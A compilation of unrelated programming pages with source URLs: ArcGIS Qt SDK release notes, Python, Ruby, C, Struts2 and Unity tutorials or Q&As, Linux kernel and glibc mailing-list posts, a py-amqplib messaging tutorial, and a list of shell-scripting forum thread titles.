Version 100.1.0 of ArcGIS Runtime SDK for Qt, also known as Update 1, is the first update to version 100.0. This topic describes what's new and changed in this release and provides a list of known issues. See Related Topics at the end of this topic for release notes for previous versions.

API changes

Due to a revamped architecture and improved API, changes are required to use projects that were built with version 10.2.6.

SDK changes

The following changes and enhancements have been made to the SDK to further improve the developer experience and create a more Qt-like development environment.

New SDK IDE integration process

Previous versions of ArcGIS Runtime SDK for Qt used .prf files to set up the various qmake variables, build options, and link options. These files were copied directly into the mkspecs/features folder of your Qt installation. In addition, QML plugins were copied directly into the Qt installation's qml folders. The copying was performed by the post installer app that launches automatically after the SDK setup process completes. These copy steps gave Qt a reliable way of discovering the ArcGIS Runtime SDK for Qt on the development machine. This worked reliably, but had some drawbacks, such as making support for side-by-side installations and plugin revisions difficult. Starting with version 100.1, .prf files and QML plugins are no longer copied into the kits. Instead, the .prf files have been converted to .pri files, so you can use the include() qmake function to include the ArcGIS Runtime SDK for Qt in your Qt apps. In addition, you should use the addImportPath() function to add the various QML plugins to the application engine's import path. If you create a new 100.1.0 template app, you can see this new workflow. This process is also explained in detail in the Qt best practices topic of the guide.
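As a sketch of the new include() workflow (the directory and file names below are hypothetical placeholders, not the SDK's actual install layout), a project's .pro file might pull in the SDK like this:

```qmake
# Hypothetical location of the SDK install; adjust to your machine.
ARCGIS_SDK_DIR = $$(HOME)/ArcGIS_SDKs/Qt100.1

# include() of the .pri file replaces the old .prf discovery
# via the Qt kit's mkspecs/features folder.
include($$ARCGIS_SDK_DIR/sdk/arcgis_runtime.pri)
```

On the C++ side, the matching step is a call such as engine.addImportPath(...) on the QQmlApplicationEngine, pointing at the SDK's QML plugin directory, before loading the main QML file.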
Migrating from 100.0 to 100.1

Due to the changes in the SDK IDE integration process described in the previous section, a few steps are required to upgrade from 100.0. The first step is to run the post installer app, which is in the tools folder of the SDK installation. When it runs, the post installer will notify you if 100.0 files are present in your Qt kit and will offer to remove them for you. It is recommended that you accept this, as it removes old 100.0 references from your Qt installation. Skipping this step could result in unexpected issues when using the newer version of the SDK. After accepting this option, proceed with the rest of the post installer. Once complete, a few changes will need to be made to your project's .pro file and main.cpp; those changes are described in the Qt best practices topic of the guide.

Note: 100.1 supports revisions, meaning that you can install 100.1 and import either 100.1 or 100.0. You do not need to maintain separate installations of 100.0 and 100.1 on your development machine; you can seamlessly switch between the new and older versions with only the 100.1 installation. For this reason, when you want to begin migrating your apps from 100.0 to 100.1, it is recommended that you simply uninstall 100.0, install 100.1, and follow the migration steps above. If you must keep concurrent installations of 100.0 and 100.1 on your development machine, the post installer must be re-run each time you want to build your app against a different version of the SDK, to ensure that the proper version is picked up by Qt.

New Sample Viewer

The sample viewer is redesigned with a new UI that works well on all platforms and devices. It showcases some of the new capabilities of Qt Quick Controls 2 and also features many architectural improvements, which should improve quality and performance.
Known issues

Maps, layers, and general

- Enabling high DPI (Qt::AA_EnableHighDpiScaling) on Android causes the MapView to scale up/down on high-resolution devices.
- Uninstalling only one version of the API (e.g. C++ or QML) is not currently supported. If you uninstall only one API, you may still see Qt Creator templates and documentation for this product.
- The uninstaller on macOS may report that some files could not be removed when, in fact, they were removed.
- Installing only the C++ API and not the QML API does not install the Toolkit.

3D

- 3D military symbol text is sometimes clipped on Windows or macOS. It is not clipped in 2D.

API changes since 100.0.0

There have been many additions to the API to support new capabilities, along with some rearranging. Here are some of those changes.

- Version 100.1 introduces new internal versioning changes to make future migrations from one version of ArcGIS Runtime to another easier. While side-by-side installations are supported, you may run into scenarios where the ArcGIS Runtime QML plugin import statement does not allow you to import 100.1 when you also have 100.0 installed. This is because the qmlimportscanner can detect the version 100.0 plugin before the 100.1 plugin, causing 100.1 import statements to fail. If you want to migrate to version 100.1, go into your Qt kit, navigate to the qml folder, and remove the Esri folder; you should then be able to import either 100.0 or 100.1 without any further issues. This is only an issue when version 100.0 is installed side-by-side with another version of ArcGIS Runtime. All future versions of ArcGIS Runtime will have a more seamless way of upgrading between releases.
- The signatures of certain signals in the C++ API have been updated to include additional arguments.
If you are already connecting to these signals using the newer Qt 5 syntax, your code will still compile, but you may wish to update the connection to include the additional parameters. If you are connecting using the older SIGNAL/SLOT syntax, your code will still compile but the connection will be invalid; you should receive a warning message at run time. In this case, you must update your connection syntax. The affected signals are:

- PortalGroup::fetchGroupUsersCompleted
- PortalItem::addCommentCompleted
- PortalItem::fetchCommentsCompleted
- PortalItem::fetchGroupsCompleted
- PortalItem::addRatingCompleted
- PortalItem::shareWithGroupsCompleted
- PortalItem::unshareGroupsCompleted
- PortalUser::fetchContentCompleted
- PortalUser::createFolderCompleted

Other changes:

- C++ model role enums have been moved. Role enums no longer exist at the global Esri::ArcGISRuntime namespace level; they are now nested inside their corresponding model class. Any code referencing these roles may need to be updated to prefix the enum values with the model class.
- The Toolkit's QML plugin path in the SDK setup does not match the GitHub repo. Therefore, when including the Toolkit PRI file (which only needs to be done for iOS with Qt 5.9), the path will need to be changed to reflect the differing folder names.
https://developers.arcgis.com/qt/latest/qml/guide/release-notes-100-1.htm
Python - Search an element in the Linked List

Searching for an element in a linked list starts by creating a temp node pointing to the head of the list. Along with this, two more variables are needed: one to track whether the search succeeded, and one to track the index of the current node. If the temp node is not null at the start, traverse the linked list, checking whether the current node's value matches the search value. If it matches, update the search tracker variable and stop traversing the list; otherwise keep traversing. If the temp node is null at the start, the list contains no items. The function SearchElement is created for this purpose. It is a 4-step process.

```python
def SearchElement(self, searchValue):
    # 1. create a temp node pointing to head
    temp = self.head

    # 2. create two variables: found - to track search,
    #    i - to track the current index
    found = 0
    i = 0

    # 3. if the temp node is not null, check each node's value
    #    against searchValue; if found, update the variables and
    #    break the loop, else continue until the temp node is null
    if temp != None:
        while temp != None:
            i += 1
            if temp.data == searchValue:
                found += 1
                break
            temp = temp.next
        if found == 1:
            print(searchValue, "is found at index =", i)
        else:
            print(searchValue, "is not found in the list.")
    else:
        # 4. if the temp node is null at the start, the list is empty
        print("The list is empty.")
```

Below is a complete program (including a minimal Node class and a push_back method) that uses the above concept to search an element in a given linked list:

```python
# node of the singly linked list
class Node:
    def __init__(self, data=None):
        self.data = data
        self.next = None

class LinkedList:
    def __init__(self):
        self.head = None

    # add an element at the end of the list
    def push_back(self, newElement):
        newNode = Node(newElement)
        if self.head is None:
            self.head = newNode
        else:
            temp = self.head
            while temp.next is not None:
                temp = temp.next
            temp.next = newNode

    # search an element
    def SearchElement(self, searchValue):
        temp = self.head
        found = 0
        i = 0
        if temp != None:
            while temp != None:
                i += 1
                if temp.data == searchValue:
                    found += 1
                    break
                temp = temp.next
            if found == 1:
                print(searchValue, "is found at index =", i)
            else:
                print(searchValue, "is not found in the list.")
        else:
            print("The list is empty.")

    # display the content of the list
    def PrintList(self):
        temp = self.head
        if temp != None:
            print("The list contains:", end=" ")
            while temp != None:
                print(temp.data, end=" ")
                temp = temp.next
            print()
        else:
            print("The list is empty.")

# test the code
MyList = LinkedList()

# add three elements at the end of the list
MyList.push_back(10)
MyList.push_back(20)
MyList.push_back(30)

# traverse to display the content of the list
MyList.PrintList()

# search for elements in the list
MyList.SearchElement(10)
MyList.SearchElement(15)
MyList.SearchElement(20)
```

The above code will give the following output:

The list contains: 10 20 30
10 is found at index = 1
15 is not found in the list.
20 is found at index = 2
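For comparison, the same search can be written more idiomatically by making the list iterable and using enumerate; the class and method names below are my own illustration, not part of the tutorial:

```python
# node of a singly linked list
class Node:
    def __init__(self, data):
        self.data = data
        self.next = None

class LinkedList:
    def __init__(self):
        self.head = None

    def push_back(self, value):
        # append a new node at the tail
        node = Node(value)
        if self.head is None:
            self.head = node
            return
        cur = self.head
        while cur.next:
            cur = cur.next
        cur.next = node

    def __iter__(self):
        # yield each node's data in order
        cur = self.head
        while cur:
            yield cur.data
            cur = cur.next

    def index_of(self, value):
        # 1-based index to match the tutorial's output, or -1 if absent
        for i, data in enumerate(self, start=1):
            if data == value:
                return i
        return -1

lst = LinkedList()
for v in (10, 20, 30):
    lst.push_back(v)

print(lst.index_of(10))   # prints: 1
print(lst.index_of(15))   # prints: -1
```

Making the list iterable also gives you membership tests (`15 in lst`) and `list(lst)` for free.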
https://www.alphacodingskills.com/python/ds/python-linked-list-search-an-element.php
I have an array filled with Datetime objects:

[Mon, 22 Jun 2015, Tue, 23 Jun 2015, Wed, 24 Jun 2015, Thu, 25 Jun 2015, Fri, 26 Jun 2015, Sat, 27 Jun 2015, Sun, 28 Jun 2015]

I know how to select what I want from the array, e.g.:

```ruby
week.select { |x| x.monday? || x.wednesday? }
```

But when I try to write a method to select days from the array, I can't seem to figure out how to pass these methods to the select statement:

```ruby
def get_days(wkn, desired_days*)
  get_week = Model.week(2)
  get_days_of_week = get_week.select { |x| x.desired_day[monday]? || x.desired_day[sunday] }
end
```

Any ideas? desired_days would be a user saying that they want Mon. and Sun., so mon, sun will get passed in as desired_days. The method will get a full week range and then I want to select out the desired days.

I would do:

```ruby
def get_days(wkn, *desired_days)
  get_week = Model.week(2)
  get_days_of_week = get_week.select { |x| desired_days.include? x.strftime("%A") }
end
```
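A runnable version of the answer's pattern, using stdlib Date objects in place of the app-specific Model class (pick_days is my own name, and the full day names are an assumption about what gets passed in):

```ruby
require 'date'

# Build the week from the question: Mon, 22 Jun 2015 .. Sun, 28 Jun 2015.
week = (Date.new(2015, 6, 22)..Date.new(2015, 6, 28)).to_a

# Same idea as the answer: keep only the dates whose weekday name
# appears in the caller's list.
def pick_days(week, *names)
  week.select { |d| names.include?(d.strftime("%A")) }
end

picked = pick_days(week, "Monday", "Sunday")
picked.each { |d| puts d }   # prints 2015-06-22 and 2015-06-28
```

Note that strftime("%A") produces full names like "Monday", so if users pass abbreviations such as "mon", you'd want to normalize both sides (e.g. compare `d.strftime("%a").downcase`).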
http://databasefaq.com/index.php/answer/1211/ruby-ruby-on-rails-4-get-x-days-out-of-an-array
On Tue, Jan 05, 1999 at 10:57:16PM -0500, Benjamin Scherrey wrote:
> Kurt -
>
> Thanx for the insightful information about the impact of changing the HZ
> values. Questions: a) how platform specific is this setting (i86, ALPHA, et al),
> and b) Does increasing the HZ value increase context switches or increase the
> duration of each context?

a) The HZ value differs between the different architectures. The alpha has, e.g.,
HZ set to 1024. That's why the kernel core has to be independent of it.
The way I coded it, it will break compilation on other archs, as I was too
lazy to put the constant HZ_TO_STD into the header files of other archs.
Of course, we could use something like

#ifndef HZ_TO_STD
#define HZ_TO_STD 1
#endif

in kernel/sys.c

b) The timer interrupt and therefore the scheduler will be called more often.
If more than one process competes for CPU (R state), then the number of
switches between these processes will occur more often, about 4 times as
often.

If I understood correctly, the bottom half data processing of the
kernel is also tied to the timer interrupt and will thus happen more often.

It speeded up some of my numerical computations on my SMP machine, BTW. I
have rc5des running (idle priority, Rik's patch), and some threads sleeping
and waiting for some job to be submitted to them. However, after they are
signalled, they will only start after the next scheduler tick. So the HZ
value influences scheduling latency. Unfortunately my program is not very
well parallelized, so the jobs to be done by the threads are very short and
take about the same time as the scheduler latency. Now, with 400 Hz it was
much better ...

> This sounds like an excellent developer's config option to me.... Any
> chance of this happening soon?

This is not up to me.

I can however create a cleaned up patch and put it on my website, if enough
people want it. It will take some days, though, as I'm very busy.

Regards,
--
https://lkml.org/lkml/1999/1/7/64
My instructions were to write a program that displays the first 20 elements of the Fibonacci series, which begins with 0, 1, and then each next number comes from adding the preceding two numbers: 0, 1, 1, 2, 3, 5, 8...

Here is what I have so far:

```c
#include <stdio.h>

int main(void)
{
    int current, prev = 1, prevprev = 0;

    for (int i = 0; i < 20; i++)
    {
        current = prev + prevprev;
        printf("%d ", current);
        prevprev = prev;
        prev = current;
    }
    printf("\n");
    return 0;
}
```

Do I have the right idea? Please help... Also part of my instructions (I'm not sure how to do this part either) is that I only display 5 members of the series per line, then start a new line, and they must be spaced neatly in 5 columns across the screen, and display some appropriate title... boy, these instructors are neat freaks!

thanks for your time and help,
-James
http://cboard.cprogramming.com/c-programming/25260-fibonacci-numbers-please-help.html
Hi Martin!

First, some self-corrections.. :-)

> > It seems like we really need some way to decode r_dev. One possible
> > solutions are to implement major(), minor(), and makedev() somewhere.

"solution is"

> > Another solution, if r_dev's raw value has no obvious use, would be to

This should be st_rdev.

> > turn it into a two-element tuple like (major, minor).

> I'd add a field r_dev_pair which splits this into major and minor. I
> would not remove r_dev, since existing code may break.

Isn't st_rdev being made available only in 2.3, through stat attributes?

> Notice that major, minor, and makedev is already available through
> TYPES on many platforms, although this has the known limitations, and
> is probably wrong for Linux at the moment.

Indeed. Here's what's defined here:

def major(dev): return ((int)(((dev) >> 8) & 0xff))
def minor(dev): return ((int)((dev) & 0xff))

def major(dev): return (((dev).__val[1] >> 8) & 0xff)
def minor(dev): return ((dev).__val[1] & 0xff)

def major(dev): return (((dev).__val[0] >> 8) & 0xff)
def minor(dev): return ((dev).__val[0] & 0xff)

--
Gustavo Niemeyer

[ 2AAC 7928 0FBF 0299 5EB5 60E2 2253 B29A 6664 3A0C ]
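For the record, the decoding this thread asks for eventually landed in the os module: modern Python exposes os.makedev(), os.major(), and os.minor() (shown here for illustration; the (8, 1) pair is just an example, e.g. /dev/sda1 on Linux):

```python
import os

# Compose a raw device number from a (major, minor) pair,
# then decode it again with os.major / os.minor.
dev = os.makedev(8, 1)

print(os.major(dev), os.minor(dev))   # prints: 8 1
```

Unlike the broken per-platform defs quoted above, these functions use the platform's own device-number encoding, so they stay correct even where major/minor no longer fit in 8 bits each.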
https://mail.python.org/pipermail/python-dev/2002-June/025224.html
I am working on a Struts2 project. I have created a URL within my project and have passed parameters using tags. My question is: how do I read the parameters in the actions? Also, if I do the same, would I be able to see the parameters as a query string? I ask because I am not able to, and I saw it in one of the tutorials.

Typically, you will interact with parameters in your actions by using fields on your actions, exposed by setters. Assume a URL carrying a firstName parameter maps to my example Struts2 action.

Action code:

```java
public class MyAction extends ActionSupport {
    private String firstName;

    public String execute() throws Exception {
        // do something here
        return SUCCESS;
    }

    public String getFirstName() {
        return firstName;
    }

    public void setFirstName(final String firstName) {
        this.firstName = firstName;
    }
}
```

JSP, using Struts tags:

```jsp
<s:property value="firstName" />
```

Using JSP EL/JSTL:

```jsp
${action.firstName}
```
https://codedump.io/share/4X5YneJNin4i/1/how-to-access-url-parameters-in-struts2
This is the mail archive of the libc-alpha@sourceware.org mailing list for the glibc project. "Carlos O'Donell" <carlos@redhat.com> writes: > OK for master with: And having waited a few days for other comments, too... Committed! Thanks to all for reviews! > - Review suggested text and accept or reject with rationale. Accepted. Thanks! > - Fix error string typo in run_command_array. Fixed. > - Delete #if 0/#endif iconv/gconv code. Deleted. > - Successful build-many-glibcs run. That took a while (because b-m-g takes a long time), and needed some minor tweaks to handle the bootstrap step in build-many-glibcs. Successful run with x86-linux and i686-hurd. The Hurd maintainer will need to provide suitable magic to containerize a test, later :-)
https://sourceware.org/legacy-ml/libc-alpha/2018-08/msg00489.html
Programming Chapter 4

Latest revision as of 20:45, 10 January 2012

Enum-ination

Let's start out by creating a new scene, "Example-4", along with a new asset folder, "Example-4 Assets", move the scene into the folder, repeat, lather, rinse. OK, on to enumerations. Enumerations are custom data types with a predefined set of values. Let's create a new file, call it "Weather", and add an enumeration with the name Temperatures like this:

```csharp
using UnityEngine;
using System.Collections;

public class Weather : MonoBehaviour
{
    public enum Temperatures
    {
        Unknown,
        Freezing,
        Cold,
        Mild,
        Warm,
        Hot
    }

    public Temperatures temperature = Temperatures.Unknown;

    protected void Update()
    {
    }

    protected void OnGUI()
    {
    }
}
```

Here we've created a type called Temperatures and created a variable, setting its initial value to Unknown from the Temperatures type. The value of our variable can only be one of the Temperatures. Now create an empty game object and attach this weather script to it. Go to the inspector and... we get a dropdown list with only these items.

Help Me Doc

Now we're going to modify the previous example slowly but surely throughout the chapter, but first let's get a little more knowledgeable about Unity and our custom script. Let's break it apart in small steps:

Import the namespaces

```csharp
using UnityEngine;
using System.Collections;
```

Here we import the UnityEngine namespace and the System.Collections namespace.

Declare the class, inherit from MonoBehaviour, and declare an enum

```csharp
public class Weather : MonoBehaviour
{
    public enum Temperatures { Unknown, Freezing, Cold, Mild, Warm, Hot }
    public Temperatures temperature = Temperatures.Unknown;
    ...
}
```

Our own custom Weather class with a custom enumeration called Temperatures. We also created a variable and set its initial value.

Methods

```csharp
protected void Update() { }
protected void OnGUI() { }
```

We have two methods... which are actually inherited from MonoBehaviour. We'll come back to inheriting functions later.
For now, go check the documentation and you should see a section called Overridable Functions which contains "Update" and "OnGUI". The descriptions say that Update is called every frame, if the MonoBehaviour is enabled, and that OnGUI is called for rendering and handling GUI events. OK, so let's play a little more. Add the following:

```csharp
public float temperatureDegrees = 39.0f;

protected void Update()
{
    temperatureDegrees++;
}

protected void OnGUI()
{
    GUILayout.Label(temperature.ToString() + " " + temperatureDegrees.ToString() + "F");
}
```

Run it and you should see the string "Unknown" on the screen with a fast-rising temperature. Update is being called every frame, so every second our degrees change quite a bit (depending on our frames per second). Now if you look at the documentation for Update, you'll see it says the function is only called if the Behaviour is enabled. Clicking on Behaviour shows that under the Variables section there is one called enabled. Click it and it says it is a bool type (the JavaScript docs write this as name : type). So, being the resourceful people that we are, let's modify our Weather.cs file and disable it after one run as follows:

```csharp
protected void Update()
{
    temperatureDegrees++;
    enabled = false;
}
```

Run and... oh crickey! Note that we didn't have to declare the variable enabled; that's done in the parent class. But notice that it disables pretty much our whole script: the OnGUI doesn't run either, since we disabled our Behaviour. This is useful, but not what we want for now. Seems we need more control.
Select Your Path

The if statement is similar to the ternary operator in that it tests a condition, but instead of returning a result it executes the next statement if the condition evaluates to true (so if you use a block { } you can execute multiple statements). else if can be used to test more conditions before using an else, which is a catch-all executed if all the if statements were false. Let's add a little interactivity to our Weather.cs file:

```csharp
protected void Update()
{
    if(temperatureDegrees > 100.0f)
    {
        temperature = Temperatures.Hot;
    }
    else if(temperatureDegrees > 70.0f)
    {
        temperature = Temperatures.Warm;
    }
    else if(temperatureDegrees > 50.0f)
    {
        temperature = Temperatures.Mild;
    }
    else if(temperatureDegrees > 32.0f)
    {
        temperature = Temperatures.Cold;
    }
    else
    {
        temperature = Temperatures.Freezing;
    }
}

protected void OnGUI()
{
    GUILayout.Label(temperature.ToString() + " " + temperatureDegrees.ToString() + "F");

    if(GUILayout.Button("Warmer"))
    {
        temperatureDegrees += 5;
    }
    if(GUILayout.Button("Colder"))
    {
        temperatureDegrees -= 5;
    }
}
```

if works in sequence. The first if is checked to see whether it evaluates to true; if true, execution enters the block following the if, while the rest of the statements are ignored. In this case the first condition evaluates to false, as temperatureDegrees (39) is less than 100, so it skips to the next statement. The second condition, else if..., evaluates to false as well, and so on until we get to the if with > 32.0f, which evaluates to true. So the value Cold is put into our temperature variable. Everything after that doesn't get evaluated, as we already have a true statement.

Iterate Iterate Iterate...

The for loop is an iteration loop that allows you to repeat a statement over and over a certain number of times. You can throw this code in at the bottom of your OnGUI method:

```csharp
int sum = 0;
for(int i = 0; i < 10; i++)
{
    sum += i;
}
GUILayout.Label(sum.ToString());
```

At the end of this loop the value of sum will be 45 (0+1+2+3+4+5+6+7+8+9). There are three statements required by a for loop (reminder: statements are separated by a semicolon):

- The initial value, in this case i=0 (you can also initialize the variable earlier).
- The condition to continue the loop, in this case: while i<10 we continue.
- The step the index takes, in this case increase i by 1 with i++ (you can also decrease).
But be careful of a never-ending loop (it just keeps going, and going, and going...):

```csharp
int i;
// i will always be less than 10 (theoretically), since we just keep decreasing its value
for(i = 0; i < 10; i--)
{
    GUILayout.Label("This is the song that never ends, it just goes on and on my friend...");
}
```

Jump n'

There are two main jump statements:

- continue: jump back to the control statement.
- break: break out of the control statement.

Now let's replace our previous loop with this one:

```csharp
int sum = 0;
int i;
for(i = 0; i < 20; i++)
{
    // if i is 5 then don't add to sum
    if(i > 4 && i < 6)
        continue;

    // if i is greater than 9 quit this loop
    if(i > 9)
        break;

    sum += i;
}
GUILayout.Label(sum.ToString());
```

In this example sum will be 40 (0+1+2+3+4+6+7+8+9), since we skipped 5 and quit when i got to 10.

Recap

- enum is the keyword used to create an enumeration type.
- The values for an enum are comma-separated and enclosed in a block { }.
- The Update and OnGUI methods are inherited from MonoBehaviour.
- enabled is a bool value which enables or disables our script.
- The if statement executes the code in its block if the condition evaluates to true; otherwise it falls to the next block, which can be an else if or an else, if one exists.
- The for statement executes the code in its block the specified number of times, until its condition is met.

Programming Index : Previous Chapter : Next Chapter
http://wiki.unity3d.com/index.php?title=Programming_Chapter_4&diff=13064&oldid=4696
What's This Module For?

To interact with a queue broker implementing version 0.8 of the Advanced Message Queueing Protocol (AMQP) standard. Copies of various versions of the specification can be found here. At time of writing, 0.10 is the latest version of the spec, but it seems that many popular implementations used in production environments today are still using 0.8, presumably awaiting the finalization of v1.0 of the spec, which is a work in progress.

What is AMQP?

AMQP is a queuing/messaging protocol that is implemented by server daemons (called 'brokers') like RabbitMQ, ActiveMQ, Apache Qpid, Red Hat Enterprise MRG, and OpenAMQ. Though messaging protocols used in the enterprise are historically proprietary, AMQP has a bold and vocal stance that AMQP will be:

- Broadly applicable for enterprise use
- Totally open
- Platform agnostic
- Interoperable

The working group consists of several huge enterprises who have a vested interest in a protocol that meets these requirements. Most are either huge enterprises who are (or were) victims of the proprietary lock-in that came with what will now likely become 'legacy' protocols, or implementers of the protocols, who will sell products and services around their implementations. Here's a brief list of those involved in the AMQP working group:

- JPMorgan Chase (the initial developers of the protocol, along with iMatix)
- Goldman Sachs
- Red Hat Software
- Cisco Systems
- Novell

Message brokers can facilitate an awfully large amount of flexibility in an architecture. They can be used to integrate applications across platforms and languages, enable asynchronous operations for web front ends, and modularize and more easily distribute complex processing operations.

Basic Publishing

The first thing to know is that when you code against an AMQP broker, you're dealing with a hierarchy: a 'vhost' contains one or more 'exchanges' which themselves can be bound to one or more 'queues'.
Here's how you can programmatically create an exchange and queue, bind them together, and publish a message:

```python
from amqplib import client_0_8 as amqp

conn = amqp.Connection(userid='guest', password='guest',
                       host='localhost', virtual_host='/', ssl=False)

# Create a channel object, queue, exchange, and binding.
chan = conn.channel()
chan.queue_declare('myqueue', durable=True)
chan.exchange_declare('myexchange', type='direct', durable=True)
chan.queue_bind('myqueue', 'myexchange', routing_key='myq.myx')

# Create an AMQP message object and publish it.
msg = amqp.Message('This is a test message')
chan.basic_publish(msg, 'myexchange', 'myq.myx')
```

As far as we know, we have one exchange and one queue on our server right now, and if that's the case, then technically the routing key I've used isn't required. However, I strongly suggest that you always use a routing key, to avoid really odd (and implementation-specific) behavior like getting multiple copies of a message on the consumer side of the equation, or getting odd exceptions from the server. The routing key can be arbitrary text like I've used above, or you can use a common formula, such as joining the queue and exchange names with '.' as I've done here. Just remember that without the routing key, the minute more than one queue is bound to an exchange, the exchange has no way of knowing which queue to route a message to. Remember: you don't publish to a queue, you publish to an exchange and tell it which queue the message goes in via the routing key.

Basic Consumption

Now that we've published a message, how do we get our hands on it? There are two methods: basic_get, which will 'get' a single message from the queue, or basic_consume, which technically doesn't get *any* messages: it registers a handler with the server and tells it to send messages along as they arrive, which is great for high-volume messaging operations.
Here's the basic_get version of a client to grab the message we just published:

```python
msg = chan.basic_get(queue='myqueue', no_ack=False)
chan.basic_ack(msg.delivery_tag)
```

In the above, I've used the same channel I used to publish the message to get it back again using the basic_get operation. I then acknowledged receipt of the message by sending the server a basic_ack, passing along the delivery_tag the server included as part of the incoming message.

Consuming Mass Quantities

Using basic_consume takes a little more thought than basic_get, because basic_consume does nothing more than register a method with the server to tell it to start sending messages down the pipe. Once that's done, however, it's up to you to do a chan.wait() to wait for messages to show up, and to find some elegant way of breaking out of this wait() operation. I've seen and used different techniques myself, and the right thing will depend on the application. The basic_consume method also requires a callback method, which is called for each incoming message and is passed the amqp.Message object when it arrives. Here's a bit of code that defines a callback method, calls basic_consume, and does a chan.wait():

```python
consumer_tag = 'foo'

def process(msg):
    txt = msg.body
    if '-1' in txt:
        print 'Got -1'
        chan.basic_cancel(consumer_tag)
        chan.close()
    else:
        print 'Got message!'

chan.basic_consume('messages', callback=process, consumer_tag=consumer_tag)

while True:
    print 'Message processed. Next?'
    try:
        chan.wait()
    except IOError as out:
        print "Got an IOError: %s" % out
        break
    if not chan.is_open:
        print "Done processing. Later"
        break
```
So, basic_consume tells the server 'Start sending any and all messages!'. The server registers a method with the name given by the consumer_tag argument, or it assigns one, which becomes the return value of basic_consume(). I define one here because I don't want to run into race conditions where I call basic_cancel() with a consumer_tag variable that doesn't exist yet, or is out of scope, or whatever. In the callback, I look for a sentinel message whose body contains '-1', at which point I call basic_cancel (passing in the consumer_tag so the server knows who to stop sending messages to), and I close the channel. In the 'while True' loop, the channel object checks its status and exits if it's not open.

The above example starts to uncover some issues with py-amqplib. It's not clear how errors coming back from the server are handled, as opposed to errors caused by the processing code, for example. It's also a little clumsy trying to determine the logic for breaking out of the loop. In this case there's a sentinel message sent to the queue representing the final message on the stack, at which point our process() callback closes the channel, but then the channel has to check its own status to move forward. Just returning False from process() doesn't break out of the while loop, because nothing is looking at that function's return value. We could have our process() function raise an error of its own as well, which might be a bit more elegant, if also a bit more work.

Moving Ahead

What I've covered here actually addresses perhaps 90% of the common cases for amqplib, but there's plenty more you can do with it. There are various exchange types, including fanout exchanges and topic exchanges, which can facilitate more interesting messaging and pub/sub models. To learn more about them, here are a couple of places to go for information:

- Broadcasting your logs with RabbitMQ and Python
- Rabbits and Warrens
- RabbitMQ FAQ section "Messaging Concepts: Exchanges"
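Stepping back from amqplib itself, the exchange/binding/routing-key relationship described earlier can be made concrete without a running broker. This is a toy in-memory model of my own, not amqplib's API: a direct exchange holds bindings, and the routing key decides which queue receives a published message.

```python
class DirectExchange:
    """Toy model of an AMQP direct exchange (illustration only)."""

    def __init__(self):
        self.bindings = {}   # routing_key -> list of bound queue names
        self.queues = {}     # queue name  -> list of delivered messages

    def queue_bind(self, queue, routing_key):
        # Mirrors chan.queue_bind: tie a queue to this exchange via a key.
        self.bindings.setdefault(routing_key, []).append(queue)
        self.queues.setdefault(queue, [])

    def publish(self, body, routing_key):
        # You publish to the exchange, never to a queue directly;
        # the routing key selects the bound queue(s). No match: dropped.
        for queue in self.bindings.get(routing_key, []):
            self.queues[queue].append(body)

ex = DirectExchange()
ex.queue_bind('myqueue', 'myq.myx')
ex.publish('This is a test message', 'myq.myx')
ex.publish('this one is dropped: no binding matches', 'other.key')
```

After these calls, 'myqueue' holds exactly one message and the unmatched publish vanished, which is precisely why the post warns you to always supply a routing key once more than one queue is bound.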
http://protocolostomy.com/2010/04/03/pytpmotw-py-amqplib/
- help with removing files which are n days old - Extracting the Filename - geting the real path - test a script about mount points - How to remove certain lines in multiple txt files? - AWK - how to "cut" a variable? - get result from database into shell script - Run command on remote sever from script - Help with Perl Module - grep or sed patterns - How to parse the listing (ls -ltr) - SED Help - Data after a string in a file - how to send multiple files from the shell script - expand and uuencode... - Invoke Perl function from Bash ? - how to use exec command in C shell - make sure logged in as userx before continuing script - Problem with shell script - Error: 0403-057 - how to change shell from BASH to C - automate ftpget to multiple hosts - Storing information in arrays.... - move in ksh - arrays in bash - SSH through a script - How to replicated records using sed - ksh and getopts - Editing Binary Files in Unix - Compairson and merging of files. - K Shell evaluating value to a variable - replace a field in a CSV file - How to export a variable from a child process running in background to the parent - Calling Functions of Other K Shell Program - error while doing decimal comparision in shell - running a shell script from another - How to parse the given word - Reading a file having junk characters in perl - replace a word in a file only first 10 occurances - ignoring blank line in a file - Cut last Field - script to read a line with spaces bet " " and write to a file - Help me to do this - call shell script with named parameters - 4 column tsv file, output 1 specific column - Sed Question 1. (Don't quite know how to use sed! 
Thanks) - how to find pine messages - problem developing for or while loops with the cut command - Convert Epoch Time to Standard Date and Time & Vice Versa - sed delete lines containing text1 or text2 - how to find matching braces using sed or in shell script - C shell arrays - Adding a footer to a flat file - sorting from several files for a specific data - How do I write multiple variable syntax? - How can i extract month number ? - Should I use PERL or Shell scripting? - How to stop asking password while running shell script? - concatenating the filenames in a directory - how to make different two process - put value of multiple sql statements into unix variables - Display mutiple line in single line - Grep/awk not getting the message correctly - AWK alias with parameters - Awk reporting. Format the output with left justification for every feild - Expect passmass - split a variable into two - SED Substitution - Creation of directoryname with Max limit - some query to be clarified - AWK script to count and then replace - error while using export command - scripting help - grep with case or if else help - Read multiple arrays in mysql - Searching array of arrays in perl - how to use html tag in shell scripting - lint and CFLAGS - Telnet TLS check script - strange output - check if user has read permissions - syntax of c shell - dead simple bash script question - read several inputs and if none input set to 9999 - weird return code processing changes - Remove spaces from first field, and write entire contents into other text file - Awk: Can anyone tell me why this doesn't work? 
- Can we write SQL cursors from shell script - sed append "\n" to end of every line in file - sed of big html files - difference between .bat and .wsh formats - Script to monitor forum - running sh file from windows - how to change IFS in arrays - Error while using getpid() is shell script - Substitution using SED - awk/sed Command: To Parse Stament between 2 numbers - Finding larg number and add one - Extracting a part of XML File - Writing given value into a file in particular record and column - how can i calculate a file using awk - Perl System command calls to variable - substring from list of files? - script to compile all libraries and forms - Problem in getting the ps information with field separator - Removing all characters on and before specific point - help on a datatabase-like script - Shell script required to uncompress and untar files - can we use routines of datastage in unix script - Crontab help - .bashrc files modifying the PS1 variable? - Problem with find command. - throw a generic message upon error - SCP logfiles from one server to another server - Review the Shell Script - update a common file in different/remote servers - if loop not working in BASH shell - Count the Consecutive Occurance of "X" in awk - grep display word only - -exec argument - Help with getopt - network and broadcast address - summery calculation - summery calculation - Grep userids - Recursively hard linking files -- bonehead question - Print to Parent Directory - awk problem - problem with while loop in BASH shell - scripting for wvdial for dial-up - Parse an XML task list to create each task.xml file - Please, review script. - code migration - simple sh script question - Can any one share a unix script for validating the export of a mapping which is in XM - Date in Perl - creating an RCS archive in /etc - schedule tasks - db2 - Need your help - tcl - best way to reboot ? 
